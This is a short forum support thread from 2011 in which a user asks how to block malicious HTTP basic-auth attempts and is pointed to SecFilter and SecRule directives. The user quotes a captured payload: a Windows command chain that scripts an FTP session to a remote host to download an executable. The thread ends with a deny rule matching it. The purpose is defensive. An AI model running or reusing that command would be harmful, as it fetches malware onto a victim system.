Support

kule · #1 02-04-2011, 05:40 AM

Is there a way I can filter attempts to hack via http auth? I'm getting http auth requests which are trying to use SQL Injection with the login/username.

It's not getting anywhere but I would like to stop the request before it reaches the application if possible? I tried using SecFilter but that doesn't seem to stop it (I assume that it's just looking at the actual request string rather than the http auth details)

EDIT: Apologies, feel free to move this in to general. I didn't mean to put this in Features/Feedback

mistwang · #2 02-04-2011, 09:47 AM

what secfilter rule you used? it should work, it can match pattern against any http request header.

kule · #3 02-05-2011, 12:24 AM

I was using

SecFilter "rewetsr"

This is the command that was coming through (after a load of unicode characters):

cmd /c echo open 1.1.1.1 21 > o&echo user 1 1 >> o &echo get rewetsr.exe >> o &echo quit >> o &ftp -n -s'

mistwang · #4 02-08-2011, 08:30 AM

use SecFilterSelective or new "SecRule" directive.

kule · #5 02-08-2011, 04:28 PM

Ok so if I read this right something like:

SecRule REMOTE_USER "rewetsr" log,deny,status:403